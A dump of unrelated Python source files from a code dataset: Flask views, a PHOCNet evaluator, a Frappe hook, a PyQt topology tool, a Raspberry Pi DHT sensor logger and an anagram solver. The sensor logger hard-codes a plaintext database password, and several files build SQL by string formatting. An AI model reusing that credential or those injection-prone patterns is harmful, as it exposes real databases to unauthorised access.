input\n","sub_path":"gkit/mail/mailitem.py","file_name":"mailitem.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543316439","text":"\"\"\"\nbyceps.blueprints.site.user_group.views\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n:Copyright: 2006-2020 Jochen Kupperschmidt\n:License: Revised BSD (see `LICENSE` file for details)\n\"\"\"\n\nfrom flask import g, request\n\nfrom ....services.user_group import service as user_group_service\nfrom ....util.framework.blueprint import create_blueprint\nfrom ....util.framework.flash import flash_error, flash_success\nfrom ....util.framework.templating import templated\nfrom ....util.views import redirect_to\n\nfrom .forms import CreateForm\n\n\nblueprint = create_blueprint('user_group', __name__)\n\n\n@blueprint.route('/')\n@templated\ndef index():\n \"\"\"List groups.\"\"\"\n groups = user_group_service.get_all_groups()\n\n return {\n 'groups': groups,\n }\n\n\n@blueprint.route('/create')\n@templated\ndef create_form(erroneous_form=None):\n \"\"\"Show a form to create a group.\"\"\"\n if not g.current_user.is_active:\n flash_error(\n 'Du musst angemeldet sein, um eine Benutzergruppe erstellen zu können.'\n )\n 
return redirect_to('.index')\n\n form = erroneous_form if erroneous_form else CreateForm()\n\n return {\n 'form': form,\n }\n\n\n@blueprint.route('/', methods=['POST'])\ndef create():\n \"\"\"Create a group.\"\"\"\n if not g.current_user.is_active:\n flash_error(\n 'Du musst angemeldet sein, um eine Benutzergruppe erstellen zu können.'\n )\n return redirect_to('.index')\n\n form = CreateForm(request.form)\n\n creator = g.current_user\n title = form.title.data.strip()\n description = form.description.data.strip()\n\n group = user_group_service.create_group(creator.id, title, description)\n\n flash_success(f'Die Gruppe \"{group.title}\" wurde erstellt.')\n return redirect_to('.index')\n","sub_path":"byceps/blueprints/site/user_group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"98161740","text":"import data\n\nfrom classes.Creature import Player\n\nfrom classes.Item import *\nfrom classes.Thing import *\n\ndataObj = data.dataObj\nplayers = {}\nfor playerId, playerData in dataObj['players'].items():\n\tif playerData['state'] == 'active':\n\t\t# instantiate player\n\t\tplayers[playerId] = Player({'id' : playerId })\n\n\t\t# instantiate nested classes (\"objects\"), e.g. items\n\n\t\tfor containerKey, items in playerData['objects'].items():\n\n\t\t\tfor objectId, objectData in items.items():\n\n\t\t\t\tif containerKey == 'items':\n\t\t\t\t\tif objectData['types']['primary'][0] == 'weapon':\n\t\t\t\t\t\tobjectClass = Weapon\n\t\t\t\t\telse:\n\t\t\t\t\t\tobjectClass = genericItem\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# other class associations here\n\t\t\t\t\tobjectClass = Thing\n\n\t\t\t\tplayers[playerId].add( \n\t\t\t\t\t\tcontainerKey, \n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tobjectId: objectClass( {\n\t\t\t\t\t\t\t\t'id': objectId,\n\t\t\t\t\t\t\t\t'dataPath': 'players/'+playerId+'/objects/'+containerKey+'/'+objectId\n\t\t\t\t\t\t\t} )\n\t\t\t\t\t\t}\n\t\t\t\t)\n\n\t\t\nfrom classes.Map import MapTile\n\nmap = {}\nfor x, row in dataObj['map'].items():\n\tmap[x] = {}\n\tfor y, mapTileObj in row.items():\n\t\tmap[x][y] = MapTile({'x':x, 'y':y})\n\n\n\t\ttry:\n\t\t\tfor containerKey, items in mapTileObj['objects'].items():\n\t\t\t\tfor objectId, objectData in items.items():\n\n\t\t\t\t\tif containerKey == 'items':\n\t\t\t\t\t\tif objectData['types']['primary'][0] == 'weapon':\n\t\t\t\t\t\t\tobjectClass = Weapon\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tobjectClass = genericItem\n\t\t\t\t\telse:\n\t\t\t\t\t\tobjectClass = Thing\n\t\t\t\t\t\n\t\t\t\t\tmap[x][y].add(\n\t\t\t\t\t\tcontainerKey,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tobjectId: objectClass( {\n\t\t\t\t\t\t\t\t'id': objectId,\n\t\t\t\t\t\t\t\t'dataPath': 'map/'+str(x)+'/'+str(y)+'/objects/'+containerKey+'/'+objectId\n\t\t\t\t\t\t\t})\n\t\t\t\t\t\t}\n\t\t\t\t\t)\n\t\texcept KeyError:\n\t\t\tpass","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144885546","text":"'''\nCreated on Jun 3, 2019\n\n@author: fwolf\n'''\n\nimport argparse\nimport copy\nimport logging\n\nfrom torch.utils.data import DataLoader\n\nfrom cnn.models.myphocnet import PHOCNet\nfrom doc_analysis.evaluation.phocnet_evaluator import PHOCNet_Evaluator\nfrom seg_based.datasets.botany import BOTDataset\nfrom seg_based.datasets.gw import GWDataset\nfrom seg_based.datasets.hwsynth import HWSynthDataset\nfrom seg_based.datasets.iam import 
IAMDataset\nfrom seg_based.datasets.rimes import RimesDataset\nfrom utils.save_load import my_torch_load\n\n\ndef load_phocnet(path, phoc_size=540):\n '''\n Loads standard PHOCNet Architecture\n\n @param path: path to the weight file (.pt)\n @param phoc_size: size of the embedding size (number of network outputs)\n\n '''\n cnn = PHOCNet(phoc_size,\n input_channels=1,\n gpp_type='gpp',\n pooling_levels=([1], [5]))\n\n cnn.init_weights()\n\n my_torch_load(cnn, path)\n return cnn\n\ndef load_dataset(dataset, split=None):\n '''\n Loads test dataset for evaluating word spotting and recogntion.\n If available a query loader is initialiazed.\n\n @param dataset: name of the test set. Options: gw, iam, rimes, bot, hwsynth\n @param split: if available defines split of the dataset\n\n '''\n\n\n qry_loader = None\n\n if dataset == 'gw':\n data_root_dir = '/vol/corpora/document-image-analysis/gw'\n test_set = GWDataset(gw_root_dir=data_root_dir,\n split_idx=int(split))\n\n if dataset == 'iam':\n data_root_dir = '/vol/corpora/document-image-analysis/iam-db'\n test_set = IAMDataset(iam_root_dir=data_root_dir,\n remove_punctuation=True)\n\n if dataset == 'rimes':\n data_root_dir = '/vol/corpora/document-image-analysis/rimes/original/icdar2011/'\n test_set = RimesDataset(rimes_root_dir=data_root_dir,\n ignore_diacrits=True)\n\n if dataset == 'hwsynth':\n data_root_dir = '/vol/corpora/document-image-analysis/hw-synth'\n test_set = HWSynthDataset(hw_root_dir=data_root_dir,\n split=split)\n if dataset == 'bot':\n data_root_dir = '/vol/corpora/document-image-analysis/competition_icfhr2016/'\n test_set = BOTDataset(bot_root_dir=data_root_dir)\n\n qry_set = copy.copy(test_set)\n qry_set.mainLoader(partition='qbe', transforms=None)\n qry_loader = DataLoader(qry_set,\n batch_size=1,\n shuffle=False,\n num_workers=8)\n\n test_set.mainLoader(partition='test', transforms=None)\n test_loader = DataLoader(test_set,\n batch_size=1,\n shuffle=False,\n num_workers=8)\n\n return test_loader, qry_loader\n\n\n\ndef evaluate():\n '''\n Evaluate standard PHOCNet\n\n Available Protocols: QbE, QbS, WR\n Available Datasets: George Washington, Botany, IAM, Rimes, HW Synth\n\n '''\n logger = logging.getLogger('PHOCNet-Evaluation::eval')\n # argument parsing\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--path', '-p', action='store', type=str,\n default='/vol/models/fwolf/phocnet/PHOCNet_gw1_1001.pt',\n help='The path of the model file')\n parser.add_argument('--dataset', '-ds', choices=['gw', 'iam', 'hwsynth', 'rimes', 'bot'], default='gw',\n help='The dataset to be trained on')\n parser.add_argument('--split', '-s', action='store', type=str, default='1',\n choices=['1','2','3','4','patrec', 'official'],\n help='The split of the dataset. Default: 1')\n parser.add_argument('--protocol', '-prot', choices=['qbe', 'qbs', 'wr', 'all'], default='all',\n help='The dataset to be trained on')\n parser.add_argument('--gpu_id', '-gpu', action='store',\n type = int, default='5',\n help='The ID of the GPU to use. 
If not specified, training is run in CPU mode.')\n\n args = parser.parse_args()\n\n\n test_loader, qry_loader = load_dataset(args.dataset, args.split)\n cnn = load_phocnet(args.path, test_loader.dataset.embedding_size())\n\n evaluator = PHOCNet_Evaluator(cnn, test_loader, args.gpu_id, qry_loader)\n\n if args.protocol == 'qbe':\n map_qbe = evaluator.eval_qbe()\n logger.info('QbE mAP: %3.2f', map_qbe*100)\n if args.protocol == 'qbs':\n map_qbs = evaluator.eval_qbs()\n logger.info('QbS mAP: %3.2f', map_qbs*100)\n if args.protocol == 'wr':\n wer = evaluator.eval_wr()\n logger.info('Recognition WER: %3.2f', wer*100)\n if args.protocol == 'all':\n map_qbe, map_qbs, wer = evaluator.eval()\n logger.info('QbE mAP: %3.2f', map_qbe*100)\n logger.info('QbS mAP: %3.2f', map_qbs*100)\n logger.info('Recognition WER: %3.2f', wer*100)\n\nif __name__ == '__main__':\n logging.basicConfig(format='[%(asctime)s, %(levelname)s, %(name)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n\n evaluate()\n","sub_path":"experiments/seg_based/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591864220","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nfrom hms_tz.nhif.api.healthcare_utils import update_dimensions\n\n\ndef validate(doc, method):\n set_prescribed(doc)\n set_missing_values(doc)\n update_dimensions(doc)\n\n\ndef after_insert(doc, method):\n set_original_item(doc)\n\n\ndef set_original_item(doc):\n for item in doc.items:\n if item.item_code:\n item.original_item = item.item_code\n item.original_stock_uom_qty = item.stock_qty\n doc.save(ignore_permissions=True)\n\n\ndef onload(doc, method):\n for item in doc.items:\n if item.last_qty_prescribed:\n frappe.msgprint(\n _(\"The item {0} was last prescribed on {1} for {2} {3}\").format(\n item.item_code,\n item.last_date_prescribed,\n item.last_qty_prescribed,\n item.stock_uom,\n ),\n )\n\n\ndef set_prescribed(doc):\n if doc.docstatus != 0:\n return\n\n for item in doc.items:\n items_list = frappe.db.sql(\n \"\"\"\n select dn.posting_date, dni.item_code, dni.stock_qty, dni.uom from `tabDelivery Note` dn\n inner join `tabDelivery Note Item` dni on dni.parent = dn.name\n where dni.item_code = %s\n and dn.patient = %s\n and dn.docstatus = 1\n order by posting_date desc\n limit 1\"\"\"\n % (\"%s\", \"%s\"),\n (item.item_code, doc.patient),\n as_dict=1,\n )\n if len(items_list):\n item.last_qty_prescribed = items_list[0].get(\"stock_qty\")\n item.last_date_prescribed = items_list[0].get(\"posting_date\")\n\n\ndef set_missing_values(doc):\n if doc.reference_doctype and doc.reference_name:\n if doc.reference_doctype == \"Patient Encounter\":\n doc.patient = frappe.get_value(\n \"Patient Encounter\", doc.reference_name, \"patient\"\n )\n\n\ndef before_submit(doc, method):\n for item in doc.items:\n if item.is_restricted and not item.approval_number:\n frappe.throw(\n _(\n \"Approval number required for {0}. 
Please open line {1} and set the Approval Number.\"\n ).format(item.item_name, item.idx)\n )\n\ndef on_submit(doc, method):\n update_drug_prescription(doc)\n\ndef update_drug_prescription(doc):\n frappe.db.sql(\"\"\"\n UPDATE `tabDrug Prescription` dp\n INNER JOIN `tabDelivery Note Item` dni ON dp.name = dni.reference_name\n SET dp.quantity = dni.stock_qty\n WHERE dni.stock_qty != dp.quantity\n AND dni.reference_doctype = \"Drug Prescription\"\n AND dni.parent = '{0}'\"\"\".format(doc.name))","sub_path":"hms_tz/nhif/api/delivery_note.py","file_name":"delivery_note.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577538432","text":"import sys\nimport json\nimport re\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom communication_networks.topology.topology_types import calc_all_topology, get_optimal_topology\n\n\nclass OptimalTopologyWindow(QtWidgets.QWidget):\n \"\"\"\n Віджет вікна для визначення оптимальної топології\n \"\"\"\n\n def __init__(self, parent):\n super().__init__()\n self.topology_data = None\n if parent:\n self.app_path = parent.app_path\n else:\n self.app_path = '..'\n with open(\"{}/resources/topology_description.json\".format(self.app_path)) as data_file:\n self.topology_data = json.load(data_file)\n\n self.topology_title = None\n self.topology_desc = None\n self.topology_image = None\n self.topology_name = None\n self.node_number = None\n self.max_node_rank = None\n self.max_links = None\n self.max_links_check = None\n self.scroll_area = None\n self.calc_button = None\n self.init_UI()\n self.show()\n\n def init_UI(self):\n \"\"\"\n Ініціалізація інтерфейсу користувача\n \"\"\"\n\n window_grid = QtWidgets.QGridLayout(self)\n window_grid.setSpacing(10)\n input_box = QtWidgets.QFrame(self)\n input_box_layout = QtWidgets.QGridLayout()\n input_box_layout.setColumnStretch(2, 1)\n\n self.topology_name = QtWidgets.QLineEdit(\"Комунікаційна мережа 1\")\n\n self.node_number = QtWidgets.QSpinBox(self)\n self.node_number.setMinimum(1)\n self.node_number.setMaximum(1000000000)\n\n self.calc_button = QtWidgets.QPushButton(\"Обчислити\")\n\n self.max_node_rank = QtWidgets.QComboBox(self)\n self.max_node_rank.addItems(['1', '2', '3', '4', '5', '6', '7', '8', '16', '32'])\n self.max_node_rank.setEditable(False)\n\n self.max_links_check = QtWidgets.QCheckBox(\"Максимально допустима кількість зв'язків\")\n self.max_links_check.toggled.connect(lambda: self.max_links.setEnabled(self.sender().checkState()))\n self.max_links = QtWidgets.QSpinBox(self)\n self.max_links.setMinimum(1)\n self.max_links.setMaximum(1000000000)\n self.max_links.setDisabled(True)\n\n self.topology_title = QtWidgets.QLabel(\"Назва топології\")\n self.topology_title.setFont(QtGui.QFont(\"SansSerif\", 14))\n self.topology_title.setAlignment(QtCore.Qt.AlignCenter)\n self.topology_desc = QtWidgets.QLabel(\"Опис\")\n self.topology_desc.setFont(QtGui.QFont(\"SansSerif\", 12))\n self.topology_desc.setAlignment(QtCore.Qt.AlignCenter)\n self.topology_desc.setWordWrap(True)\n self.topology_image = QtWidgets.QLabel(self)\n self.topology_image.setPixmap(QtGui.QPixmap(None))\n self.topology_image.setScaledContents(True)\n\n input_box_layout.addWidget(QtWidgets.QLabel(\"Назва мережі\"), 0, 0, 1, 1)\n input_box_layout.addWidget(self.topology_name, 0, 1, 1, 1)\n input_box_layout.addWidget(QtWidgets.QLabel(\"Введіть кількість вузлів\"), 1, 0, 1, 1)\n input_box_layout.addWidget(self.node_number, 1, 1, 1, 1)\n 
input_box_layout.addWidget(QtWidgets.QLabel(\"Максимально допустимий порядок вузла\"), 2, 0, 1, 1)\n input_box_layout.addWidget(self.max_node_rank, 2, 1, 1, 1)\n input_box_layout.addWidget(self.max_links_check, 3, 0, 1, 1)\n input_box_layout.addWidget(self.max_links, 3, 1, 1, 1)\n input_box_layout.addWidget(self.calc_button, 4, 0, 1, 2)\n input_box_layout.addWidget(self.topology_title, 0, 2, 1, 4)\n input_box_layout.addWidget(self.topology_desc, 1, 2, 4, 3)\n input_box_layout.addWidget(self.topology_image, 1, 5, 4, 1)\n\n self.calc_button.clicked.connect(self.find_optimal_topology)\n\n self.scroll_area = QtWidgets.QScrollArea()\n self.scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\n self.scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.scroll_area.setWidgetResizable(True)\n \n scroll_layout = QtWidgets.QVBoxLayout()\n\n widget = QtWidgets.QWidget()\n widget.setLayout(scroll_layout)\n self.scroll_area.setWidget(widget)\n\n input_box.setLayout(input_box_layout)\n\n window_grid.addWidget(input_box, 0, 0)\n window_grid.addWidget(QtWidgets.QLabel(\"Результати\"), 1, 0)\n window_grid.addWidget(self.scroll_area, 2, 0)\n self.setLayout(window_grid)\n\n def find_optimal_topology(self):\n \"\"\"\n Повертає оптимальну топологію\n \"\"\"\n node_num = self.node_number.value()\n max_node_rank = int(self.max_node_rank.currentText())\n max_links_num = self.max_links.value() if self.max_links_check.checkState() else 0\n\n # Обчислення всіх топологій\n try:\n result = calc_all_topology(node_num, max_node_rank, max_links_num)\n\n if result:\n # Вибір найкращої топології серед відфільтрованих\n result_topology = get_optimal_topology(result)\n topology_type = result_topology[0]\n name_filter = {\n \"Кубічна n-вимірна решітка\": r\"Кубічна \\d+-вимірна решітка\",\n \"Кубічний n-вимірний тор\": r\"Кубічний \\d+-вимірний тор\"\n }\n for repl, pattern in name_filter.items():\n topology_type = re.sub(pattern, repl, topology_type)\n\n self.topology_title.setText(result_topology[0])\n self.topology_desc.setText(self.topology_data[topology_type][\"description\"])\n self.topology_image.setPixmap(\n QtGui.QPixmap(\"{0}/resources/{1}\".format(self.app_path,\n self.topology_data[topology_type][\"src\"])))\n self.show_table(result_topology)\n self.topology_name.setText(\"Комунікаційна мережа {}\".format(int(self.scroll_area.widget().layout().count() / 2) + 1))\n return result_topology\n else:\n self.topology_title.setText(\"Назва топології\")\n self.topology_desc.setText(\"Опис\")\n self.topology_image.setPixmap(QtGui.QPixmap(None))\n return QtWidgets.QMessageBox.information(QtWidgets.QMessageBox(), \"Інформація\",\n \"Жодна з топологій не задовольняє вимогам\",\n QtWidgets.QMessageBox.Ok)\n except ValueError as ex:\n QtWidgets.QMessageBox.information(QtWidgets.QMessageBox(), \"Помилка\", str(ex), QtWidgets.QMessageBox.Ok)\n\n def show_table(self, result_topology):\n \"\"\"\n Виводить таблицю з результатом\n \"\"\"\n result_table = QtWidgets.QTableWidget(0, 7)\n result_table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n result_table.setFont(QtGui.QFont(\"SansSerif\", 9))\n result_table.setSortingEnabled(False)\n result_table.horizontalHeader().setFont(QtGui.QFont(\"SansSerif\", 8))\n result_table.setHorizontalHeaderLabels([\"Назва топології\", \"Кількість вузлів\", \"Кількість зв'язків\",\n \"Максимальний діаметр\", \"Порядок вузлів\", \"Ширина бісекції\",\n \"Коефіцієнт симетрії\"])\n\n row_position = result_table.rowCount()\n 
result_table.insertRow(row_position)\n        for i, p in enumerate(result_topology):\n            item = IntTableWidgetItem(str(p), p)\n            result_table.setItem(row_position, i, item)\n        result_table.setSortingEnabled(True)\n\n        # Фіксування висоти таблиці\n        table_height = 0\n        table_height += result_table.horizontalHeader().sizeHint().height()\n        for i in range(result_table.rowCount()):\n            table_height += result_table.rowHeight(i)\n        result_table.setFixedHeight(table_height)\n\n        layout = self.scroll_area.widget().layout()\n        layout.addWidget(QtWidgets.QLabel(self.topology_name.text()), 0, QtCore.Qt.AlignTop)\n        layout.addWidget(result_table, 1, QtCore.Qt.AlignTop)\n\n\nclass IntTableWidgetItem(QtWidgets.QTableWidgetItem):\n    \"\"\"\n    Новий віджет для числового змісту клітинки таблиці\n    \"\"\"\n    def __init__(self, text, sort_key):\n        QtWidgets.QTableWidgetItem.__init__(self, text, QtWidgets.QTableWidgetItem.UserType)\n        self.sort_key = sort_key\n\n    def __lt__(self, other):\n        if isinstance(self.sort_key, type(other.sort_key)):\n            return self.sort_key < other.sort_key\n        else:\n            return str(self.sort_key) < str(other.sort_key)\n\n\nif __name__ == \"__main__\":\n    app = QtWidgets.QApplication(sys.argv)\n    wnd = OptimalTopologyWindow(None)\n    sys.exit(app.exec_())\n","sub_path":"communication_networks/gui/optimal_topology_window.py","file_name":"optimal_topology_window.py","file_ext":"py","file_size_in_byte":9493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67452245","text":"duration = int (input('Продолжительность в секундах: '))\nminute = 60\nhour = 3600\nday = 86400\nif duration < hour:\n    minute = duration // 60 % 60\n    second = duration % 60\n    print ('{} мин {} сек'.format(minute,second));\nelif duration >= hour and duration < day:\n    day = duration // 86400\n    hour = duration // 3600 % 24\n    minute = duration // 60 % 60\n    second = duration % 60\n    print ('{} час {} мин {} сек'.format(hour,minute,second));\nelif duration >= day:\n    day = duration // 86400\n    hour = duration // 3600 % 24\n    minute = duration // 60 % 60\n    second = duration % 60\n    print('{} дн {} час {} мин {} сек'.format(day, hour, minute, second));\n","sub_path":"stasevich_svyatoslav_dz_1_task_1.py","file_name":"stasevich_svyatoslav_dz_1_task_1.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121080677","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#this script was designed to work with python2\nimport pymysql\nimport sys\nimport Adafruit_DHT\nimport datetime\nimport time\nimport logging\nimport logging.handlers\nimport socket\n\n#destination for the XML File\npath = '/var/www/html/xml/feucht.xml'\n#set up logging\nlogFormatter = logging.Formatter('%(asctime)s - %(levelname)s: %(message)s')\nrootLogger = logging.getLogger()\nfileHandler = logging.handlers.RotatingFileHandler('/var/log/dht/dht.log',maxBytes=1000000,backupCount=5)\nfileHandler.setFormatter(logFormatter)\nconsole = logging.StreamHandler()\nrootLogger.addHandler(fileHandler)\nrootLogger.addHandler(console)\nrootLogger.setLevel(logging.INFO)\n\n\n#DHT11 Inputs setzen\ndht11 = list()\nwith open('/home/pi/pinconfig/dht11.cfg', mode= 'r') as file:\n\tfor line in file:\n\t\tdht11 = line.split(',')\n\t\tlogging.info(\"DHT11 GPIOS are: \" + str(dht11))\n\n#DHT22 Inputs setzen\ndht22 = list()\nwith open('/home/pi/pinconfig/dht22.cfg', mode= 'r') as file:\n\tfor line in file:\n\t\tdht22 = line.split(',')\n\t\tlogging.info(\"DHT22 GPIOS are: \" + 
str(dht22))\n\n#find out local ip address (we want to tell the receivers the name of the system)\nlocal = (([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith(\"127.\")] or [[(s.connect((\"8.8.8.8\", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + [\"no IP found\"])[0]\n\n#header - figure out system name\nsql = \"select name from messsystem where ip = '%s';\" % (local)\ntry:\n\tdb = pymysql.connect(host='localhost', user='webuser', password='t5sLhtva6Ev8xjptFpGhu2zupsy64sgTndg',db='serverraum_temperaturueberwachung',autocommit=True)\n\tcursor = db.cursor()\n\tlogging.info(\"Connected to database\")\n\tlogging.debug(sql)\n\tcursor.execute(sql)\n\tsystemname = cursor.fetchone()[0]\n\tlogging.info(\"SystemName is: \" +systemname)\n\tdb.close()\nexcept Exception as e:\n\tlogging.error(e)\n\tsys.exit()\n\ndhtprefix = systemname.split(' ')[1] + systemname.split(' ')[2]\n\nwhile True:\n\t#connection stays open until an error\n\ttry:\n\t\tdb = pymysql.connect(host='localhost', user='webuser', password='t5sLhtva6Ev8xjptFpGhu2zupsy64sgTndg',db='serverraum_temperaturueberwachung',autocommit=True)\n\t\tcursor = db.cursor()\n\t\tlogging.info(\"Connected to database\")\n\texcept Exception as e:\n\t\tlogging.error(e)\n\t\tcontinue\n\twhile True:\n\t\t#connect to database\n\t\ttry:\n\t\t\tcursor.execute(\"select sensorKennung, sensorID, sensorPosition from sensor where fk_systemID = (select systemID from messsystem where ip = '\"+local+\"') order by sensorName;\")\n\t\t\tsensoren = cursor.fetchall()\n\t\t\tlogging.debug(sensoren)\n\t\t\t# read 1-wire slaves list\n\t\t\tsql = \"insert into messung (zeit , fk_sensorID, temp, feucht) values\"\n\t\t\tout = ''\n\t\t\tnow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\tlogging.debug(\"beginning\")\n\t\t\t#save measurements to the database and produce xml, missing sensors will be created automatically\n\t\t\tfor pin in dht11:\n\t\t\t\tpin = int(pin)\n\t\t\t\tlogging.debug(\"reading GPIO: \" + str(pin))\n\t\t\t\tsk = 'dht'+ str(dhtprefix) + str(pin)\n\t\t\t\ttry:\n\t\t\t\t\tfeucht, temp = Adafruit_DHT.read_retry(Adafruit_DHT.DHT11, pin)\n\t\t\t\t\tsql = sql + \" ('%s',func_getSID('%s'), %d, %d),\" % (now, sk, temp, feucht)\n\t\t\t\t\tfor sensor in sensoren:\n\t\t\t\t\t\tif str(sensor[0]) == sk:\n\t\t\t\t\t\t\tlogging.debug(\"here\")\n\t\t\t\t\t\t\tout= out + ''+str(sensor[1])+''+str(temp)+''+str(feucht)+''+now+''\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tlogging.error(e)\n\t\t\tfor pin in dht22:\n\t\t\t\tpin = int(pin)\n\t\t\t\tlogging.debug(\"reading GPIO: \" + str(pin))\n\t\t\t\tsk = 'dht'+ str(dhtprefix) + str(pin)\n\t\t\t\ttry:\n\t\t\t\t\tfeucht, temp = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, pin)\n\t\t\t\t\tsql = sql + \" ('%s',func_getSID('%s'), %d, %d),\" % (now, sk, temp, feucht)\n\t\t\t\t\tfor sensor in sensoren:\n\t\t\t\t\t\tif str(sensor[0]) == sk:\n\t\t\t\t\t\t\tlogging.debug(\"here\")\n\t\t\t\t\t\t\tout= out + ''+str(sensor[1])+''+str(temp)+''+str(feucht)+''+now+''\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tlogging.error(e)\n\t\t\tout = out + \"\"\n\t\t\tlogging.debug(out)\n\t\t\twith open(path, \"w\") as xml:\n\t\t\t\txml.write(out)\n\t\t\tlogging.info(\"XML File successfully generated\")\n\t\t\tlogging.debug(sql[:-1] + \";\")\n\t\t\tcursor.execute(sql[:-1] + \";\")\n\t\t\tlogging.info(\"Data successfully inserted into database\")\n\t\t\t#wait for 5 seconds\n\t\t\ttime.sleep(5)\n\t\texcept Exception as 
g:\n\t\t\tlogging.error(g)\n\t\t\tlogging.info(\"Database Connection will be reopened\")\n\t\t\tdb.close()\n\t\t\tbreak","sub_path":"home/pi/skripts/readdht.py","file_name":"readdht.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394778835","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Lee A. Congdon \nDate : 2021-09-02\nPurpose: Tiny Python Projects unscramble exercise\n\"\"\"\n\nfrom operator import pos\nimport os\nimport argparse\nimport re\n\n\ndef get_args():\n \"\"\"Parse arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Unscramble words',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('text',\n help='Input text or file',\n metavar='text')\n\n args = parser.parse_args()\n if os.path.isfile(args.text):\n args.text = open(args.text, \"r\", encoding=\"utf-8\").read()\n return args\n\n\ndef anagram(word):\n \"\"\"Return a list of word anagrams\"\"\"\n sorted_word = ''.join(sorted(word))\n entries = {}\n with open(\"./test_dictionary.txt\", \"r\", encoding='utf-8') as dictionary:\n for entry in dictionary.read().split():\n sorted_entry = ''.join(sorted(entry))\n if sorted_entry not in entries:\n entries[sorted_entry] = []\n entries[sorted_entry].append(entry)\n if sorted_word in entries:\n return entries[sorted_word]\n else:\n return []\n\n\ndef unscramble(word):\n \"\"\"Unscramble a word\"\"\"\n if len(word) > 3 and re.match(r'\\w+', word):\n for possible_word in anagram(word):\n if (possible_word[0] == word[0]) & (possible_word[-1] == word[-1]):\n word = possible_word\n\n return word\n\n\ndef main():\n \"\"\"Main program\"\"\"\n\n args = get_args()\n splitter = re.compile(r\"([a-zA-Z](?:[a-zA-Z']*[a-zA-Z])?)\")\n for line in args.text.splitlines():\n print(''.join(map(unscramble, splitter.split(line.rstrip()))))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"16_scrambler/unscramble.py","file_name":"unscramble.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"390167498","text":"import numpy as np\nfrom evol_proc import evol_proc\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-b1', '--b1', type=float, default=2.0, help=\"The parameter of state 1\")\nparser.add_argument('-b2', '--b2', type=float, default=2.0, help=\"The parameter of state 2\")\nargs = parser.parse_args()\n\n\ndef get_evol_data():\n \"\"\"\n\n Returns:\n\n \"\"\"\n # setting up the objects and defining the parameters\n beta = 1; b2 = args.b2; c = 1; b1 = args.b1; n_gen = 10**4; n_it = 100\n # Vectors that store the cooperation rates for each scenario in each round\n coops = np.zeros((1, n_gen)).flatten()\n coop1 = np.zeros((1, n_gen)).flatten()\n coop2 = np.zeros((1, n_gen)).flatten()\n # Vectors that store the average frequency of each memory-1 strategy\n freqs = np.zeros((1, 2 ** 2)).flatten()\n freq1 = np.zeros((1, 2 ** 2)).flatten()\n freq2 = np.zeros((1, 2 ** 2)).flatten()\n # Define the transitions of the three scenarios\n # In each q, there three cases, 2 C (CC), 2 D (CD or DC), 2D (DD)\n qs = np.array([[0.9, 0.9, 0.1], [0.1, 0.1, 0.9]]) # the scenario that transition between state 1 and state 2\n #q1 = np.array([[0, 0, 0], [1, 1, 1]]) # only in the state 1\n #q2 = np.array([[1, 1, 1], [0, 0, 0]]) # only in the state 2\n # Vector with all possible one-shot payoffs\n pi_round = np.array([0, b1, -c, b1 - c, 0, b2, -c, b2 - c])\n\n 
